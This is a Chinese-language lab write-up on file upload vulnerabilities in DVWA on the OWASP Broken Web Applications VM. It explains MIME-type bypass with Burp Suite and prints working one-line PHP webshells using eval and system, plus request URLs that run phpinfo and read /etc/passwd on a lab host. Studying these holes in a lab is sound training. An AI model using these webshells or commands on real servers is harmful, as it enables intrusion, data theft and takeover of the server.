web安全---文件上传漏洞实验
实验环境目标靶机:OWASP_Broken_Eeb_Apps_VM_1.2下载地址:https://sourceforge.net/projects/owaspbwa/files/百度云链接:链接:https://pan.baidu.com/s/1tyLOkABir4ChpSDOy50g8Q提取码:wf4qOWASP Broken Web Applications ProjectBroken We
实验环境
目标靶机:OWASP_Broken_Eeb_Apps_VM_1.2
下载地址:https://sourceforge.net/projects/owaspbwa/files/
百度云链接:链接:https://pan.baidu.com/s/1tyLOkABir4ChpSDOy50g8Q
提取码:wf4q
OWASP Broken Web Applications Project
Broken Web Applications ( BWA )项目生成一一个虚拟机,运行各种具有已知漏洞的应用程序,供以下人员使用:
-了解Web应用程序安全性
-测试手册评估技术
-测试自动化工具
-测试源代码分析工具
-观察网络攻击:
-测试WAF和类似的代码技术
测试渗透机:kali-linux
链接:https://pan.baidu.com/s/1U1FBI8NlMkwBf1BmViv7Sw
提取码:sdn9
实验原理
1、文件.上传( File Upload )是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
2、正常的文件-般是文档、 图片、视频等, Web应用收集之后放入后台存储,需要的时候再调用出来返回
3、如果恶意文件如PHP、ASP等执行文件绕过web应用,并顺利执行,则相当于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell ,则可以拿到web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击web服务,实际渗透两种相结合,达到对目标的深度控制
实验一
低安全模式下,上传任意文件类型的文件,文件大小限制
打开靶机
进入web界面选择DVWA
登录名和密码是:admin
选择文件上传
查看低安全模式下源码
代码缺陷:
1、没有对文件类型进行过滤,本意接受上传图片,实际却可以上传php;
2、对文件大小限制为100K其实没有用。由于是客户端进行限制的,利用截断,我们可以轻易修改文件大小限制;
上传PHP文件
通过文件上传"一句话木马"的php,中国菜刀获取靶机的webshell
文件管理(可进行增删改操作)
获取到的SHELL
实验二
中安全模式下对文件类型进行了限制,采用绕过类型上传文件
修改mime类型
中安全模式上传PHP显示
使用工具BURPSUIT进行代理,kali里面包含了这个工具
开启代理后上传PHP
修改MIME后进行转发
后续步骤中国菜刀进行,和实验一类似
实验三
切换到高安全模式下
webshell
小马:一句话木马也称小马,即整个shell代码量只有一行,一般是系统执行函数。
大马:代码量功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到
shell2.php #eval 使用php函数,例如phpinfo();
<?php eval($_REQUEST['cmd']);?>
http://192.168.1.132/dvwa/hackable/uploads/shell2.php?cmd=phpinfo();
shell3.php #system 使用Linux系统命令,例如ls cp rm
<?php system($_REQUEST['limao']);?>
http://192.168.1.132/dvwa/hackable/uploads/shell2.php?limao=cat /etc/passwd
中国菜刀
<?php eval($_POST['cmd']);?>
说明:REQUEST是在网页输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构
更多推荐
所有评论(0)